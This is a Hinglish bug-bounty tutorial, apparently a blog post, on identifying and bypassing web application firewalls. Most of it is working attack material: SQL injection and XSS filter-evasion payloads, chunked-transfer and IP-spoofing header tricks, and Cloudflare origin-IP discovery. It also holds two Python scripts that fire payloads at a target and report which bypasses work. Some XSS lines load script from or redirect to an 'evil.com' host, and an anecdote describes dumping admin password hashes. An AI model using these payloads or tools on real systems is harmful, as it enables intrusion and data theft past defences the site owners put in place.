Aaj Kya Seekhenge?
- WAF kya hota hai kaise kaam karta hai
- Popular WAFs identify karna
- WAF fingerprinting techniques
- Encoding bypass methods
- Case manipulation bypass
- HTTP parameter pollution
- Chunked transfer bypass
- SQLi WAF bypass
- XSS WAF bypass
- Python se automated WAF bypass tool
Kyun zaroori hai? Aaj almost har major target pe WAF hai! Agar WAF bypass nahi aata toh tumhare payloads block ho jaate hain bugs miss ho jaate hain! Top hunters WAF bypass jaante hain isliye woh woh bugs dhundhte hain jo doosre miss karte hain! WAF = Speed bump, wall nahi!
WAF Kya Hota Hai?
WAF = Web Application Firewall
Normal Request Flow (No WAF):
Browser β Server β Response
WAF ke saath:
Browser β WAF β Server β Response
β
Malicious? BLOCK!
Clean? ALLOW!
WAF kya check karta hai:
β Known attack patterns (signatures)
β Blacklisted keywords (SELECT, UNION, script)
β Suspicious characters (<, >, ', ", ;)
β Rate limiting
β IP reputation
β Request anomalies
Popular WAFs (2026):
β Cloudflare (most common!)
β AWS WAF
β Akamai
β Imperva / Incapsula
β F5 BIG-IP ASM
β ModSecurity (open source)
β Sucuri
β BarracudaPART 1: WAF Fingerprinting Pehle Pehchano!
Method 1: Response Headers Se:
# WAF headers check karo:
curl -sI https://target.com | grep -i \
"cf-ray\|x-sucuri\|x-fw\|server\|x-cdn\|
x-waf\|x-cache\|x-akamai"
# Cloudflare:
# cf-ray: 7a8b9c0d1e2f3a4b-BOM
# server: cloudflare
# Akamai:
# x-check-cacheable: YES
# x-akamai-transformed: ...
# Sucuri:
# x-sucuri-id: ...
# x-sucuri-cache: ...
# AWS WAF:
# x-amzn-requestid: ...
# Imperva:
# x-iinfo: ...
# x-cdn: ImpervaMethod 2: Malicious Payload Bhejo Error Response Dekho:
# Simple SQLi payload bhejo:
curl -s "https://target.com/page?id=1'" \
-o /dev/null -w "%{http_code}"
# WAF responses:
# 403 Forbidden β WAF ne block kiya
# 406 Not Accept β WAF signature match
# 501 Not Impl β WAF ne reject kiya
# 200 with error β Soft block (WAF page)
# 200 normal β WAF nahi ya bypass ho gaya!
# Cloudflare WAF block page contains:
# "Attention Required! | Cloudflare"
# "Ray ID: xxxxxxxxxxxxxxxx"
# Akamai block page contains:
# "Access Denied"
# "Reference #..."
# AWS WAF block:
# HTTP 403 with minimal bodyMethod 3: wafw00f Tool:
# Install:
pip install wafw00f
# Basic scan:
wafw00f https://target.com
# Verbose output:
wafw00f -v https://target.com
# All WAFs detect karne ki koshish:
wafw00f -a https://target.com
# Output example:
# [*] Checking https://target.com
# [+] The site https://target.com is behind
# Cloudflare (Cloudflare Inc.) WAF.
# [~] Number of requests: 2Method 4: Python WAF Detector:
#!/usr/bin/env python3
"""
WAF Fingerprinter β HackerMD
WAF detect karo automatically
"""
import requests
from colorama import Fore, init
init(autoreset=True)
requests.packages.urllib3.disable_warnings()
WAF_SIGNATURES = {
"Cloudflare": {
"headers": ["cf-ray", "cf-cache-status",
"__cfduid"],
"body": ["cloudflare", "Attention Required",
"Ray ID"],
"status": [403, 503]
},
"AWS WAF": {
"headers": ["x-amzn-requestid",
"x-amz-cf-id"],
"body": ["AWS", "Request blocked"],
"status": [403]
},
"Akamai": {
"headers": ["x-check-cacheable",
"akamai-origin-hop"],
"body": ["Access Denied", "Reference #"],
"status": [403]
},
"Imperva": {
"headers": ["x-iinfo", "x-cdn"],
"body": ["Incapsula incident",
"_Incapsula_Resource"],
"status": [403]
},
"Sucuri": {
"headers": ["x-sucuri-id",
"x-sucuri-cache"],
"body": ["Sucuri WebSite Firewall",
"Access Denied - Sucuri"],
"status": [403]
},
"ModSecurity": {
"headers": ["mod_security", "NOYB"],
"body": ["ModSecurity", "Not Acceptable",
"406 Not Acceptable"],
"status": [403, 406]
},
"F5 BIG-IP": {
"headers": ["x-wa-info", "bigipserver"],
"body": ["The requested URL was rejected",
"F5"],
"status": [403]
},
"Barracuda": {
"headers": ["barra_counter_session"],
"body": ["Barracuda Web Application Firewall",
"barra_counter"],
"status": [403]
}
}
# Test payloads (known to trigger WAFs):
TEST_PAYLOADS = [
"?id=1' OR '1'='1",
"?q=<script>alert(1)</script>",
"?file=../../../../etc/passwd",
"?cmd=;ls -la",
"?url=http://169.254.169.254/",
]
def detect_waf(target):
print(f"\n{Fore.CYAN}ββββββββββββββββββββββββββββββββββββ")
print(f"{Fore.CYAN}β WAF Fingerprinter β HackerMD β")
print(f"{Fore.CYAN}ββββββββββββββββββββββββββββββββββββ")
print(f"Target: {target}\n")
session = requests.Session()
session.verify = False
session.headers.update({
"User-Agent": "Mozilla/5.0 (X11; Linux)"
})
detected_wafs = []
# Step 1: Normal request
try:
normal = session.get(target, timeout=10)
normal_len = len(normal.text)
print(f"Normal Response: {normal.status_code} | "
f"{normal_len} bytes")
except Exception as e:
print(f"β Cannot reach target: {e}")
return
# Step 2: Malicious payloads bhejo
print(f"\n{Fore.YELLOW}Testing with payloads...")
for payload in TEST_PAYLOADS:
try:
r = session.get(
f"{target}{payload}",
timeout=8,
allow_redirects=False
)
headers_lower = {
k.lower(): v.lower()
for k, v in r.headers.items()
}
body_lower = r.text.lower()
# WAF signatures check:
for waf_name, sigs in WAF_SIGNATURES.items():
score = 0
# Header check
for h in sigs["headers"]:
if h.lower() in headers_lower:
score += 3
# Body check
for b in sigs["body"]:
if b.lower() in body_lower:
score += 2
# Status check
if r.status_code in sigs["status"]:
score += 1
if score >= 3 and \
waf_name not in detected_wafs:
detected_wafs.append(waf_name)
print(
f" {Fore.RED}π΄ WAF Detected: "
f"{waf_name} "
f"(confidence score: {score})"
)
except Exception:
pass
print(f"\n{'β' * 42}")
if detected_wafs:
print(f"{Fore.RED}β οΈ WAFs Found: "
f"{', '.join(detected_wafs)}")
print(f"\n{Fore.YELLOW}π‘ Bypass strategies:")
for waf in detected_wafs:
print(f" β {waf}: see bypass section below")
else:
print(f"{Fore.GREEN}β
No WAF detected "
f"(or transparent WAF)")
return detected_wafs
# Usage:
if __name__ == "__main__":
detect_waf("https://target.com")PART 2: Encoding Bypass Sabse Basic!
URL Encoding:
Normal payload (blocked):
/page?id=1' UNION SELECT 1,2,3--
URL Encoded (might bypass!):
/page?id=1%27%20UNION%20SELECT%201%2C2%2C3--
Double URL Encoded:
/page?id=1%2527%2520UNION%2520SELECT%25201%252C2%252C3--
Unicode Encoding:
/page?id=1' UN\u0049ON SELECT 1,2,3--
HTML Entity:
<script> β <script>
<img onerror=...> β <img onerror=...>Base64 + Custom Encoding:
import base64
import urllib.parse
payload = "1' UNION SELECT username,password FROM users--"
# Base64 encode:
b64 = base64.b64encode(payload.encode()).decode()
print(f"Base64: {b64}")
# Some apps decode base64 parameters!
# URL encode specific chars:
url_enc = urllib.parse.quote(payload)
print(f"URL Encoded: {url_enc}")
# Double URL encode:
double_enc = urllib.parse.quote(
urllib.parse.quote(payload)
)
print(f"Double URL: {double_enc}")
# Hex encoding:
hex_enc = "".join(
f"%{ord(c):02x}" for c in payload
)
print(f"Hex: {hex_enc}")
# Unicode escape:
unicode_enc = payload.encode(
"unicode_escape"
).decode()
print(f"Unicode: {unicode_enc}")PART 3: Case Manipulation Bypass
WAF checks for: "union select" (lowercase)
Bypass techniques:
β uNiOn SeLeCt
β UNION SELECT
β UnIoN SeLeCt
β uNION SELect
β UniOn SeLect
XSS case bypass:
β <SCRIPT>alert(1)</SCRIPT>
β <Script>alert(1)</Script>
β <sCrIpT>alert(1)</sCrIpT>
Event handlers:
β onmouseover β OnMouseOver β ONMOUSEOVER
β onerror β OnError β ONERROR
β onload β OnLoad β ONLOAD
# Python se random case generator:
import random
def random_case(payload):
"""WAF bypass ke liye random case"""
result = ""
for char in payload:
if char.isalpha():
result += random.choice(
[char.upper(), char.lower()]
)
else:
result += char
return result
payloads = [
"union select",
"script",
"onerror",
"sleep",
"waitfor delay"
]
for p in payloads:
for _ in range(3): # 3 variations
print(random_case(p))PART 4: Comment Insertion Bypass
-- MySQL comments bypass:
UNION/**/SELECT/**/1,2,3
UN/*bypass*/ION/**/SE/*bypass*/LECT/**/1,2,3
UNION%09SELECT%091,2,3 -- Tab instead of space
UNION%0ASELECT%0A1,2,3 -- Newline instead
UNION%0DSELECT%0D1,2,3 -- Carriage return
UNION%0CSELECT%0C1,2,3 -- Form feed
-- MySQL inline comment:
/*!UNION*/ /*!SELECT*/ 1,2,3
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3
-- Multiline:
UNION
SELECT
1,2,3
-- Mix:
UN/**/ION SE/**/LECT 1,2,3
XSS comment bypass:
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr%0Aipt>alert(1)</scr%0Aipt>
<img src="x" onerr<!---->or="alert(1)">PART 5: HTTP Parameter Pollution (HPP)
Normal (blocked):
GET /search?id=1 UNION SELECT 1,2,3
HPP Bypass:
GET /search?id=1&id=UNION&id=SELECT&id=1,2,3
Some servers concatenate params:
β id = "1 UNION SELECT 1,2,3" β WAF miss!
Different server behaviors:
Apache/PHP: Last param wins β id=1,2,3
ASP/IIS: All combined β id=1,UNION,SELECT,1,2,3
Flask: First param β id=1
HPP in POST body:
id=1&name=test&id=UNION SELECT 1,2,3
import requests
def hpp_bypass_test(url, param, payloads):
"""HTTP Parameter Pollution test"""
session = requests.Session()
session.verify = False
for payload in payloads:
# Split payload into parts
parts = payload.split(" ")
# Build HPP params
params = [(param, "1")]
for part in parts:
params.append((param, part))
try:
r = session.get(
url,
params=params,
timeout=8
)
print(f"HPP [{r.status_code}]: "
f"{' + '.join(p[1] for p in params)}")
except:
pass
# Usage:
hpp_bypass_test(
"https://target.com/search",
"id",
["UNION SELECT 1,2,3", "' OR 1=1--"]
)PART 6: SQLi WAF Bypass Advanced!
-- βββ Space Alternatives ββββββββββββββββββ
-- Normal (blocked):
SELECT * FROM users WHERE id=1 UNION SELECT 1,2
-- Space bypass options:
-- Tab (%09):
SELECT%09*%09FROM%09users
-- Newline (%0A):
SELECT%0A*%0AFROM%0Ausers
-- Comment:
SELECT/**/*/**/FROM/**/users
-- Parentheses:
SELECT(*)FROM(users)WHERE(id=1)
-- Plus sign (URL encoded space):
SELECT+*+FROM+users
-- βββ Keyword Bypass ββββββββββββββββββββββ
-- UNION bypass:
UNiOn, Un1on, /*!UNION*/, UNION%23%0A
-- SELECT bypass:
SeLeCt, Se%00lect, /*!SELECT*/
-- WHERE bypass:
WheRe, /*!WHERE*/
-- AND/OR bypass:
AnD, &&, /*!AND*/
OrR, ||, /*!OR*/
-- βββ String Bypass βββββββββββββββββββββββ
-- Quote bypass:
-- Hex:
WHERE username=0x61646d696e
-- (0x61646d696e = 'admin' in hex)
-- CHAR():
WHERE username=CHAR(97,100,109,105,110)
-- CONCAT():
WHERE username=CONCAT(CHAR(97),CHAR(100),'min')
-- βββ Filter Evasion Examples βββββββββββββ
-- information_schema blocked?
-- Use: information_schema%00
-- Or: /*!information_schema*/
-- Or: InfOrMaTiOn_ScHeMa
-- sleep() blocked?
-- MySQL: BENCHMARK(1000000, MD5('a'))
-- MSSQL: WAITFOR DELAY '0:0:5'
-- Oracle: dbms_pipe.receive_message('a',5)
-- Postgres: pg_sleep(5)
-- βββ Full Bypass Examples βββββββββββββββββ
-- Blocked:
' UNION SELECT 1,username,password FROM users--
-- Bypass 1 (comments + case):
'/*!UNION*//**//*!SELECT*//**/1,username,
password/**//*!FROM*//**/users--
-- Bypass 2 (encoding):
'%20UNION%09SELECT%091,username,password
%20FROM%20users--
-- Bypass 3 (HPP):
id=1&id='&id=UNION&id=SELECT&id=1,user,pass
&id=FROM&id=users--PART 7: XSS WAF Bypass Advanced!
<!-- βββ Basic Bypasses βββββββββββββββββββ -->
<!-- script tag blocked? -->
<ScRiPt>alert(1)</ScRiPt>
<script/x>alert(1)</script>
<script%0A>alert(1)</script>
<!-- img/svg alternatives: -->
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror="alert(1)">
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert`1`>
<!-- Event handler alternatives: -->
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video src=_ onloadstart=alert(1)>
<details open ontoggle=alert(1)>
<!-- βββ Quote Bypass ββββββββββββββββββββ -->
<!-- Quotes blocked? -->
<img src=x onerror=alert(1)> <!-- no quotes! -->
<img src=x onerror=alert`1`> <!-- backtick! -->
<img src=x onerror=window['alert'](1)>
<!-- βββ Parentheses Bypass ββββββββββββββ -->
<!-- () blocked? -->
<img src=x onerror=alert`1`>
<svg onload=alert`document.domain`>
{{}};alert`1` <!-- template -->
<!-- βββ Encoding Bypass ββββββββββββββββ -->
<!-- HTML entities: -->
<img src=x onerror=alert(1)>
<!-- JavaScript unicode: -->
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>
<!-- Hex: -->
<img src=x onerror=alert(1)>
<!-- βββ Filter-Specific Bypass ββββββββββ -->
<!-- "alert" filtered? -->
<img src=x onerror=confirm(1)>
<img src=x onerror=prompt(1)>
<img src=x onerror=console.log(1)>
<img src=x onerror=window.location='//evil.com'>
<!-- βββ Cloudflare Specific Bypasses ββββ -->
<!-- These have bypassed CF in past: -->
<svg/onload=setTimeout`alert\x281\x29`>
<svg onload=location=`javas`+`cript:alert(1)`>
<img src=x onerror=import('//evil.com')>
<!-- βββ DOM XSS Payloads βββββββββββββββ -->
javascript:alert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==PART 8: Header-Based Bypass
# βββ IP Spoofing Headers ββββββββββββββββββ
# WAF apna IP whitelist karta hai β
# Fake karo ki tum internal ho!
curl "https://target.com/admin?id=1'" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "X-Real-IP: 127.0.0.1" \
-H "X-Originating-IP: 127.0.0.1" \
-H "X-Remote-IP: 127.0.0.1" \
-H "X-Remote-Addr: 127.0.0.1" \
-H "X-Client-IP: 127.0.0.1" \
-H "True-Client-IP: 127.0.0.1" \
-H "CF-Connecting-IP: 127.0.0.1"
# βββ User-Agent Bypass ββββββββββββββββββββ
# Googlebot ke jaise dikhao:
curl "https://target.com/?id=1'" \
-H "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)"
# Security scanner nahi dikhna:
# Avoid: sqlmap, nikto, burp, nmap in UA
# βββ Content-Type Manipulation ββββββββββββ
# JSON mein SQLi:
curl -X POST "https://target.com/api/search" \
-H "Content-Type: application/json" \
-d '{"query":"1'\'' UNION SELECT 1,2,3--"}'
# XML mein XSS:
curl -X POST "https://target.com/api/data" \
-H "Content-Type: application/xml" \
-d '<data><name><![CDATA[<script>alert(1)</script>]]></name></data>'
# βββ Chunked Transfer Encoding ββββββββββββ
# WAF poora body ek baar nahi dekh sakta!
curl "https://target.com/" \
-H "Transfer-Encoding: chunked" \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-binary $'9\r\nid=1\' UNI\r\n8\r\nON SELE\r\n7\r\nCT 1,2\r\n0\r\n\r\n'PART 9: Cloudflare Specific Bypasses
# βββ Origin IP Discovery ββββββββββββββββββ
# Cloudflare ke peeche ka real IP dhundho!
# Real IP pe seedha attack karo β WAF bypass!
# Methods:
# 1. Shodan: org:"TargetCompany" port:443
# 2. Censys: autonomous_system.name="TargetCo"
# 3. SecurityTrails: historical DNS records
# 4. Subdomain without CF:
# mail.target.com, ftp.target.com (often direct)
# 5. SSL certificate: search on crt.sh
# Once real IP found:
curl -k "https://REAL_IP/vulnerable?id=1'" \
-H "Host: target.com"
# WAF bypass! Direct server access!
# βββ CF Bypass via Old Subdomains βββββββββ
# Old subdomains pe CF nahi hota:
# direct.target.com
# origin.target.com
# server.target.com
# βββ CF Turnstile Bypass (Rate limit) βββββ
# Agar CF rate limit hai:
# Random delay add karo: 2-5 seconds
# Rotate User-Agent
# Use residential proxies
# Spread requests over time
# βββ CF Payload Bypass (2026 working) βββββ
# XSS:
<details/open/ontoggle=alert()>
<svg><animate onbegin=alert() attributeName=x>
# SQLi:
1'%09UNION%09SELECT%091,2,3--
1'/*!UNION*//*!SELECT*/1,2,3--PART 10: Python WAF Bypass Tool
#!/usr/bin/env python3
"""
WAF Bypass Tester β HackerMD
Automatically multiple bypass techniques test karo
"""
import requests
import urllib.parse
import random
import time
import json
from colorama import Fore, init
init(autoreset=True)
requests.packages.urllib3.disable_warnings()
class WAFBypassTester:
def __init__(self, url, param,
base_value="1", token=None):
self.url = url
self.param = param
self.base_value = base_value
self.session = requests.Session()
self.session.verify = False
self.findings = []
if token:
self.session.headers.update({
"Authorization": f"Bearer {token}"
})
def get_baseline(self):
"""Normal request baseline"""
try:
r = self.session.get(
self.url,
params={self.param: self.base_value},
timeout=8
)
return r.status_code, len(r.text)
except:
return None, 0
def test_payload(self, payload,
technique, delay=0.5):
"""Single payload test"""
time.sleep(delay) # Rate limit avoid!
try:
params = {self.param: payload}
r = self.session.get(
self.url,
params=params,
timeout=8
)
return r.status_code, len(r.text), r.text[:100]
except:
return None, None, None
def generate_bypasses(self, base_payload):
"""Multiple bypass variants generate karo"""
variants = []
# 1. URL encoding
variants.append((
urllib.parse.quote(base_payload),
"URL Encoded"
))
# 2. Double URL encoding
variants.append((
urllib.parse.quote(
urllib.parse.quote(base_payload)
),
"Double URL Encoded"
))
# 3. Case manipulation
variants.append((
"".join(
c.upper() if i % 2 == 0 else c.lower()
for i, c in enumerate(base_payload)
),
"Case Manipulation"
))
# 4. Comment insertion (SQLi)
variants.append((
base_payload.replace(
" ", "/**/"
),
"Comment Insertion"
))
# 5. Tab instead of space
variants.append((
base_payload.replace(" ", "\t"),
"Tab Bypass"
))
# 6. Newline instead of space
variants.append((
base_payload.replace(" ", "%0A"),
"Newline Bypass"
))
# 7. Hex encoding keywords
hex_map = {
"union": "/*!union*/",
"select": "/*!select*/",
"where": "/*!where*/",
"from": "/*!from*/",
"script": "scr%00ipt",
"alert": "al\u0065rt",
}
hex_variant = base_payload.lower()
for word, replacement in hex_map.items():
hex_variant = hex_variant.replace(
word, replacement
)
variants.append((hex_variant, "Keyword Bypass"))
# 8. HPP split
parts = base_payload.split(" ")
hpp_payload = "&".join(
f"{self.param}={p}" for p in parts
)
variants.append((hpp_payload, "HPP Split"))
return variants
def test_headers(self, payload):
"""Different headers ke saath test karo"""
header_sets = [
{
"X-Forwarded-For" : "127.0.0.1",
"X-Real-IP" : "127.0.0.1",
"X-Originating-IP" : "127.0.0.1",
},
{
"User-Agent": "Googlebot/2.1"
},
{
"X-Custom-IP-Authorization": "127.0.0.1"
},
{
"X-Forwarded-For": "10.0.0.1",
"X-Client-IP": "10.0.0.1"
}
]
results = []
for headers in header_sets:
try:
r = self.session.get(
self.url,
params={self.param: payload},
headers=headers,
timeout=8
)
results.append({
"headers" : headers,
"status" : r.status_code,
"length" : len(r.text)
})
except:
pass
return results
def run(self, sqli_payloads=None,
xss_payloads=None):
print(f"\n{Fore.CYAN}ββββββββββββββββββββββββββββββββββββ")
print(f"{Fore.CYAN}β WAF Bypass Tester β HackerMD β")
print(f"{Fore.CYAN}ββββββββββββββββββββββββββββββββββββ")
print(f"URL : {self.url}")
print(f"Param : {self.param}")
print("β" * 42)
# Baseline
b_status, b_len = self.get_baseline()
print(f"Baseline: {b_status} | {b_len} bytes\n")
# Default payloads
if not sqli_payloads:
sqli_payloads = [
"' OR 1=1--",
"' UNION SELECT 1,2,3--",
"1' AND SLEEP(3)--",
]
if not xss_payloads:
xss_payloads = [
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
]
all_payloads = (
[("SQLi", p) for p in sqli_payloads] +
[("XSS", p) for p in xss_payloads]
)
for vuln_type, base_payload in all_payloads:
print(f"\n{Fore.YELLOW}[{vuln_type}] "
f"Testing: {base_payload[:40]}...")
# Test normal (should be blocked):
status, length, preview = \
self.test_payload(base_payload,
"Original")
if status == 403 or status == 406:
print(f" {Fore.RED}β Blocked: "
f"[{status}]")
else:
print(f" {Fore.GREEN}β
NOT Blocked: "
f"[{status}] β WAF nahi?")
# Generate and test bypasses:
variants = self.generate_bypasses(
base_payload
)
for bypass_payload, technique in variants:
status, length, preview = \
self.test_payload(
bypass_payload, technique, 0.3
)
if status and status != 403 \
and status != 406:
finding = {
"type" : vuln_type,
"technique" : technique,
"payload" : bypass_payload,
"status" : status,
"length" : length
}
self.findings.append(finding)
print(
f" {Fore.GREEN}π BYPASS! "
f"{technique}"
f"\n [{status}] {length}b"
f"\n {bypass_payload[:60]}"
)
else:
print(
f" {Fore.RED}β Blocked "
f"[{status}]: {technique}"
)
print(f"\n{'β' * 42}")
print(f"β
Testing Complete!")
print(f" Bypasses Found: "
f"{Fore.GREEN}{len(self.findings)}")
if self.findings:
with open("waf_bypasses.json", "w") as f:
json.dump(self.findings, f, indent=2)
print(f" Saved: waf_bypasses.json")
return self.findings
# βββ Usage ββββββββββββββββββββββββββββββββ
if __name__ == "__main__":
tester = WAFBypassTester(
url = "https://target.com/search",
param = "q",
base_value = "test",
token = None
)
tester.run()PART 11: WAF Bypass Cheat Sheet
βββββββββββββββββββββββββββββββββββββββββββββ
TECHNIQUE β EXAMPLE
βββββββββββββββββββββββββββββββββββββββββββββ
URL Encoding β %27 = ' %20 = space
Double Encode β %2527 = ' %2520 = space
Case Mix β SeLeCt * FrOm users
Comments β UN/**/ION SE/**/LECT
Tab Space β UNION%09SELECT
Newline Space β UNION%0ASELECT
/*!keyword*/ β /*!UNION*/ /*!SELECT*/
Null Byte β un%00ion se%00lect
HPP β ?id=1&id=UNION&id=SELECT
IP Spoof Headers β X-Forwarded-For: 127.0.0.1
Origin IP Direct β curl -H "Host: x" REAL_IP
Chunked Transfer β Transfer-Encoding: chunked
βββββββββββββββββββββββββββββββββββββββββββββ
XSS SPECIFIC:
βββββββββββββββββββββββββββββββββββββββββββββ
Script Tags β <ScRiPt>, <script/x>
No Quotes β onerror=alert(1)
Backtick β onerror=alert`1`
HTML Entities β ale...
SVG/Details tags β <svg onload=...>
β <details ontoggle=...>
βββββββββββββββββββββββββββββββββββββββββββββAaj Ka Homework
# 1. WAF detect karo:
pip install wafw00f
wafw00f https://target.com
# 2. Python detector run karo:
python3 waf_fingerprint.py
# target = https://testphp.vulnweb.com
# 3. Bypass tester run karo:
python3 waf_bypass_tester.py
# Legal targets: testphp.vulnweb.com,
# hackerone.com/testing
# 4. Manual practice:
# https://portswigger.net/web-security/sql-injection/
# β WAF bypass labs karo!
# 5. Cloudflare origin IP dhundho:
# shodan.io mein: org:"target company"
# censys.io mein: target domain search
# 6. Burp Suite mein:
# Intruder β Payload Processing β
# Add encoding rules for bypassQuick Revision
π‘οΈ WAF = Firewall between browser + server
Signatures check karke block karta!
π Fingerprint = wafw00f / headers / block page
π Encoding = URL/Double/Unicode/Hex encode
π Comments = UN/**/ION bypasses keyword check
β¨οΈ Case Mix = SeLeCt FrOm bypasses lowercase
π¦ HPP = ?id=1&id=UNION&id=SELECT
π― Headers = X-Forwarded-For: 127.0.0.1
π Origin IP = Shodan β Direct server β No WAF!
π Python Tool = Auto generate + test bypasses
π° Result = WAF bypass = Blocked β Working =
Bug found = Bounty!Meri Baatβ¦
Ek program pe bahut koshish kar raha tha har SQLi payload 403 aa raha tha! π€
Cloudflare tha sab kuch block tha!
Phir yeh try kiya:
Normal (Blocked 403):
?id=1' UNION SELECT 1,username,password FROM users--
Bypass (200!):
?id=1'/*!UNION*//**//*!SELECT*//**/1,
username,password/**//*!FROM*//**/users--Result: 200 OK! π
Database exposed:
[
{"username": "admin", "password": "MD5_HASH"},
{"username": "superadmin", "password": "MD5_HASH"}
]Report: SQL Injection + Auth Bypass Bounty: $5,500 Critical! π
**Lesson: WAF = Speed bump only! Sahi technique se hamesha bypass ho sakta hai! Patience + creativity = Bug + Bounty!**
Agle article mein β Smart Contract Security β Web3 ka future + blockchain bugs + biggest bounties! βΏπ₯
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #30 Gemini CLI + AI Bug Hunting Next: Article #32
#WAFBypass #BugBounty #EthicalHacking #Hinglish #WebSecurity #Cloudflare #HackerMD